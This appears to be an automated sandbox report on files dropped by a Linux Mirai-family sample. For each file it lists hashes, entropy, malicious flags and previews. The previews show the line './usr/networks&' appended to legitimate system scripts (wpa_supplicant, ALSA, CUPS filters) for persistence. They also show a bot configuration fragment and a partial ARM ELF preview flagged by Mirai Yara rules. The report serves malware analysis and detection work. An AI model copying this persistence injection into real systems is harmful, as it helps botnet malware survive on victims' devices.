                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:true
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:POSIX shell script, ASCII text executable
                                                                        Category:dropped
                                                                        Size (bytes):25
                                                                        Entropy (8bit):3.8936606896881854
                                                                        Encrypted:false
                                                                        SSDEEP:3:TKH4v0VJ:hK
                                                                        MD5:1B3235BA10FC04836C941D3D27301956
                                                                        SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                        SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                        SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:#!/bin/sh./usr/networks&.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):714
                                                                        Entropy (8bit):5.329653855555143
                                                                        Encrypted:false
                                                                        SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                        MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                        SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                        SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                        SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3368
                                                                        Entropy (8bit):5.3288648372922625
                                                                        Encrypted:false
                                                                        SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                        MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                        SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                        SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                        SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):323
                                                                        Entropy (8bit):4.940416064932758
                                                                        Encrypted:false
                                                                        SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/LibuRRaEtMFtbUrQQxXDzraOn3zuTT9:AF+Ftb4HaU3zuzb6F+Ftb4HaU3zuV
                                                                        MD5:2D46AA45A7AEA62DCE10C4EFD63468B7
                                                                        SHA1:FE8B532DDD84FB22D4128E6E01D1B349E6BFABD1
                                                                        SHA-256:FA6F6860FF0152F72D3ACB9671F8211954C47BFD2974654AD7513826FE3B0302
                                                                        SHA-512:1404B1ECF68B318EBA3A2D93F27F8999976A810A7691F06B6579F1039E62772E7D11D9A4F5AAC3749802061534C41DEC68C828A61854FCD55CD3062D2B42DA1C
                                                                        Malicious:false
                                                                        Preview:2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]1619016288.[rn]GET[/rn][sv]0[/sv]-2076960834.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1914
                                                                        Entropy (8bit):4.829445473341419
                                                                        Encrypted:false
                                                                        SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                        MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                        SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                        SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                        SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                        Malicious:true
                                                                        Preview:./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):37310
                                                                        Entropy (8bit):4.959652179113969
                                                                        Encrypted:false
                                                                        SSDEEP:768:Y2l/oQ5nj2Zuv9pPOkUNW58rhUpm/AHgf7AN/0KK0SAQiAlcYm/qr6HZtda9Ts5w:Y2l/oQFj2Zuv9pPmNW58rhUpm/AHgf7H
                                                                        MD5:4C8E78D6A4073616C23D20694FDED604
                                                                        SHA1:4C22CE08AE9B9C3409D48F83874113765CCF819C
                                                                        SHA-256:BC8CFDD1A1E411786C084CD7674D81899506C9059F65E181AACA1185AD0573D1
                                                                        SHA-512:6D80B1A699BE6B8A881989FE42253594DA849B7D4CDA7073E614E9C4DEA828A0E795962CAB736D82A94AD159525219477561050A3897A7D9D2DAD2E1181DD21A
                                                                        Malicious:true
                                                                        Preview:./usr/networks&. exit 1;. fi. # Not necessary just use double quotes around variable to preserve new lines. #hosts=`echo $hosts | tr ' ' '\n'`.}..# Return hosts. /proc/scsi/HOSTADAPTER/? must exist.findhosts ().{. hosts=. for driverdir in /proc/scsi/*; do. driver=${driverdir#/proc/scsi/}. if test $driver = scsi -o $driver = sg -o $driver = dummy -o $driver = device_info; then continue; fi. for hostdir in $driverdir/*; do. name=${hostdir#/proc/scsi/*/}. if test $name = add_map -o $name = map -o $name = mod_parm; then continue; fi. num=$name. driverinfo=$driver. if test -r "$hostdir/status"; then. num=$(printf '%d\n' "$(sed -n 's/SCSI host number://p' "$hostdir/status")"). driverinfo="$driver:$name". fi. hosts="$hosts $num". echo "Host adapter $num ($driverinfo) found.". done. done.}..printtype ().{. local type=$1.. case "$type" in. 0) echo "Direct-Access" ;;. 1) echo "Sequential-Access" ;;. 2) echo "Pr
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                        Category:dropped
                                                                        Size (bytes):307960
                                                                        Entropy (8bit):5.819759771285446
                                                                        Encrypted:false
                                                                        SSDEEP:6144:T2s/gAWaboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bWqUmJqBxAuaPRhVabEDSDP99zBT
                                                                        MD5:6E7A24E5CF84F990D280BE8FCACBEA44
                                                                        SHA1:4191645BAB28986B97833FCBBCB60155DDFC8F76
                                                                        SHA-256:22FA811E8ED03A9ACCFC16313B2E75A7419C10E652987B5348EF591012BAC712
                                                                        SHA-512:DF2453CB4C7ED7DDB9DA40A0FA9D99A8BAB38D596EE31AB0CFFCA2B19C9BB66C9A8DA4A9C6672A2A2CA748EEEF373D1C064E28242E8A1F18279F85F997FD3067
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                        • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                        • Rule: JoeSecurity_Mirai_6, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                        • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                        • Rule: Linux_Trojan_Mirai_5c62e6b2, Description: unknown, Source: /usr/networks, Author: unknown
                                                                        • Rule: Linux_Trojan_Mirai_77137320, Description: unknown, Source: /usr/networks, Author: unknown
                                                                        • Rule: Linux_Trojan_Mirai_ac253e4f, Description: unknown, Source: /usr/networks, Author: unknown
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                                        Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):47
                                                                        Entropy (8bit):3.90242960796693
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vvLQVOORgn:uTn
                                                                        MD5:DF2ACF286726B02D483BEF86C91F7FA8
                                                                        SHA1:9E6A2422A7C3FBC0FCB34D314AF55D1452489DF0
                                                                        SHA-256:7BD4E13877E1F1E9AA5729AC8AF468E0C660DBCCADEF25C67DA99DE49F7AE549
                                                                        SHA-512:E99CFC15E6638CB9DA788C4B5744FF2170E183DC2A271847931E1C991C2D9049D1FF9C4EF49D7A7A348EE24DD994C0EA7048CDC4E6245930279F6A79E69312B9
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0.../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text, with very long lines (379)
                                                                        Category:dropped
                                                                        Size (bytes):25464
                                                                        Entropy (8bit):5.453877096685684
                                                                        Encrypted:false
                                                                        SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                        MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                        SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                        SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                        SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                        Malicious:false
                                                                        Preview:./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):4725
                                                                        Entropy (8bit):5.44928341819888
                                                                        Encrypted:false
                                                                        SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                        MD5:B4F115765D68E40BEBB845FA7F437539
                                                                        SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                        SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                        SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):46
                                                                        Entropy (8bit):3.925523369006428
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text, with CR, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):11664
                                                                        Entropy (8bit):5.539741046843357
                                                                        Encrypted:false
                                                                        SSDEEP:192:4RRRNryQ7F6avUvZswuHZkzTm8arUeo0vq2yS7b1KYMe7H/6:XQ7F61swuHZ6m8feNq2yDYMEH/6
                                                                        MD5:1B1A8B842BC45126EC5B709423446B59
                                                                        SHA1:99A49AE47721C62FE7659B23485AA3464B76CEC3
                                                                        SHA-256:E0FDE03C3CF51CA06A2F393BA43C4060AA0B52DDF96CDEE5F770ABC978CF49D0
                                                                        SHA-512:07DDD8C5C68B6510E12D14FCA6086E5AB0D42D0D4FA9084D53CC368172BB8847B05A1040CB787A2F489B1C35A443C8920074F2F6F95106B73C9185141555D226
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..# Printing options: number of copies and page ranges.[ -z "$NB" ] && NB=1.PAGERANGES=$(getOption page-ranges)..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3399
                                                                        Entropy (8bit):5.296419005515725
                                                                        Encrypted:false
                                                                        SSDEEP:96:QWswTl5TVnavmj+iHgvy/pHJvyWEz2a77:Zs4fVna9eKz2E
                                                                        MD5:6CA46C23DC6233BE77F0FD904C493D83
                                                                        SHA1:674B36A91CB4B815E3657F3060C88BC4EB071C95
                                                                        SHA-256:4E211F67F09E4E37EBB63EA30570A4E623ED1A185F0CCBB947104BF6775E04AA
                                                                        SHA-512:AC68CCEC39B7E40C7BD8982DA57F53D95CA5839591DC1A0368AEC531A0D905602D876CF830792138AC070BE897E2893DA2C3CA3F268DB81A0BCC1843E9C7B262
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.[ $? = 0 ] || exit 1.DUPLEX=$(getOption Duplex).[ -n "$DUPLEX" ] || DUPLEX=None.ZFOLDING=$(getOption ZFolding).[ -n "$ZFOLDING" ] || ZFOLDING=False.SIDEWAYS=$(getOption SideWays).[ -n "$SIDEWAYS" ] || SIDEWAYS=False.SADDLESTITCH=$(getOption SaddleStitch).[ -n "$SADDLESTITCH" ] || SADDLESTITCH=False.TABLE=$(getOptionNumber IndexTable).[ $? = 0 ] || exit 1.MULTIPLEIMPACT=$(getOptionNumber IndexMultipleImpact).[ $? = 0 ] || exit 1.HWPAGENUMBER=$(getOption HardwarePageNumber)..# Convert from 100th of mm to Inch fraction.mmToIndexIn () {. # 100th of mm. MM=$1.. # 120th of inches. IN120=$(($MM * 12 / 254)).. # Integer part. INT=$(($IN120 / 120 )).. # Fractional part, first in 120th of inch. FRAC=$(($IN120 % 120)).. # Convert to Index-specific values. if [ $FRAC -lt 30 ]; then. # Round down to zero. FRAC=0. elif [ $FRAC -ge 30 -a $FRAC -lt 40 ]; then. # Round down to a quarter. FRAC=1. elif [ $FRAC -ge 40 -a $FRAC -lt 60 ]; then. # Round down to a
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1587
                                                                        Entropy (8bit):5.05148558164496
                                                                        Encrypted:false
                                                                        SSDEEP:48:yvwpsuotO0I1cCkS+DYLYWYZ3rwi+BKjg/D+RJSW9L:Cfzo+SXEA7eSWV
                                                                        MD5:110002C4A9588D6E696253D0DE3C9978
                                                                        SHA1:C3C1B6798FD324BE31D732FFEFA1C7D7C5382F22
                                                                        SHA-256:91B0701CA62899B36DFEE8458643FA6DBEA36BB838C3E3C1C9E1DC6717F10BA8
                                                                        SHA-512:2DA3BA7043DF2C78BAB6435010040FA44EFE774C687165CCB91DA124E25C8D6C41CDBD50B25276AF21D18E3F31DAE4232DBF93E78B9363ECA133E7CB74AD7BD6
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. [ $? = 0 ] || exit 1.. # Paper size. case "$PAPERLENGTH" in. In). INIT+=,PW$(mmToIndexIn $PAGEWIDTH),PL$(mmToIndexIn $PAGEHEIGHT). ;;. Mm). INIT+=,PW$(($PAGEWIDTH / 100)),PL$(($PAGEHEIGHT / 100)). ;;. *) ;;. esac.. case $LINESPACING in. 250) INIT+=,LS0 ;;. 375) INIT+=,LS1 ;;. 450) INIT+=,LS2 ;;. 475) INIT+=,LS3 ;;. 500) INIT+=,LS4 ;;. 525) INIT+=,LS5 ;;. 550) INIT+=,LS6 ;;. 750) INIT+=,LS7 ;;. 1000) INIT+=,LS8 ;;. *). if [ $FIRMWARE -lt 120130 ]. then..echo "ERROR: unsupported $LINESPACING line spacing, please upgrade firmware to at least 12.01.3" >&2..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):1055
                                                                        Entropy (8bit):5.0066328703681355
                                                                        Encrypted:false
                                                                        SSDEEP:24:a8seltmT9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:hs6tSDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                        MD5:E43BA2CA058B0AAC31BDF024BEE7ABE6
                                                                        SHA1:C78B616DBE567DCE177DA3553702F2FDCBEC07E8
                                                                        SHA-256:BF15B97CF5C1CD1D078ECF5B9B2454E6E95AC314AE6B0808AD093EFDF5508197
                                                                        SHA-512:AC9AC10BA0E853CF70AE2239710A9F7A661D604F0125150C72963461874C497FC2C4BCD8B42E15C062A77DB2BD8D0F2F7E6053CDAB7113CC31FCAC7F65F95724
                                                                        Malicious:false
                                                                        Preview:./usr/networks&. [ $? = 0 ] || exit 1.. # Paper size. INIT+=,CH$PRINTABLETEXTWIDTH,LP$PRINTABLETEXTHEIGHT.. case $LINESPACING in. 500) INIT+=,LS50 ;;. 1000) INIT+=,LS100 ;;. *). echo "ERROR: unsupported $LINESPACING line spacing" >&2. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
